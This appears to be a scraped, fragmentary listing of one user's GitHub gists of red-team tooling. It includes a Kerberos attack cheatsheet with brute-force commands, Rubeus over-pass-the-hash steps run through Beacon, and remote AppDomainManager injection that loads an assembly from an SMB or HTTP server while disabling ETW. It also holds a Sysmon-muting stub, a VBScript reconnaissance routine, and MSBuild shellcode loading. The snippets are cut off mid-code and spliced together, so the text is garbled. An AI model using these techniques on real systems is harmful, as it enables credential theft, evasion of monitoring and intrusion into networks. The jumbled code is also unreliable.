
#DISCLAIMER
#I'm not the original author of the script...
#Original git repo vanished
function String-to-ByteArray ($String)
{
$ByteArray=@()
For ( $i = 0; $i -lt ($String.Length/2); $i++ )
{
$Chars=$String.Substring($i*2,2)
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@leftp
leftp / WindowsExtensionMapCSVPlus.bat
Created June 30, 2020 12:31 — forked from olliencc/WindowsExtensionMapCSVPlus.bat
Enumerate via various methods what opens what on Windows 10 using only batch/cmd
@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions ²°
REM °² and what opens them on Windows 10 in batch/cmd ²°
REM °² twitter: @ollieatnccgroup ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM ------------------------------------------------------
REM
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
namespace MuteSysmon
{
class Program
@leftp
leftp / kerberos_attacks_cheatsheet.md
Created July 20, 2020 11:32 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@leftp
leftp / README.md
Created September 1, 2020 17:36 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to, say, C:\Test. Let's use aspnet_compiler.exe as an example.
  2. Compile test.cs to test.dll with a signed strong name; this is required to load an assembly outside of a .NET application's base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
@leftp
leftp / gist:1d812f71a92b3cff1593d9c6a7de8a62
Created September 10, 2020 11:09 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@leftp
leftp / dnscanary_wmi
Created October 20, 2020 10:39
WMI dns canary
Dim dnsname
dnsname= "canary.troubleshootdomain.com"
Set wmi = GetObject("winmgmts:")
Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'")
'' Griffon main actions start here.
Set file_system_object = CreateObject("Scripting.FileSystemObject")
temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName
' Start the detailed recon.
recon_info_str = get_network_adapter_info
network_info_str = ""
recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"
@leftp
leftp / _Steps.md
Created November 30, 2020 18:58
Capability Diffusion 101 - MsBuild Sets - Shellcode.exe spikes - Shellcode Horcrux if you like that analogy.

1. Open PowerShell
2. Set MSbuild GodMode Env Variable 
   $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
   Note: This "Serves" Shellcode in a memory mapped file. 
   This is not accessible to other processes. 
   Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
 I leave this for you to explore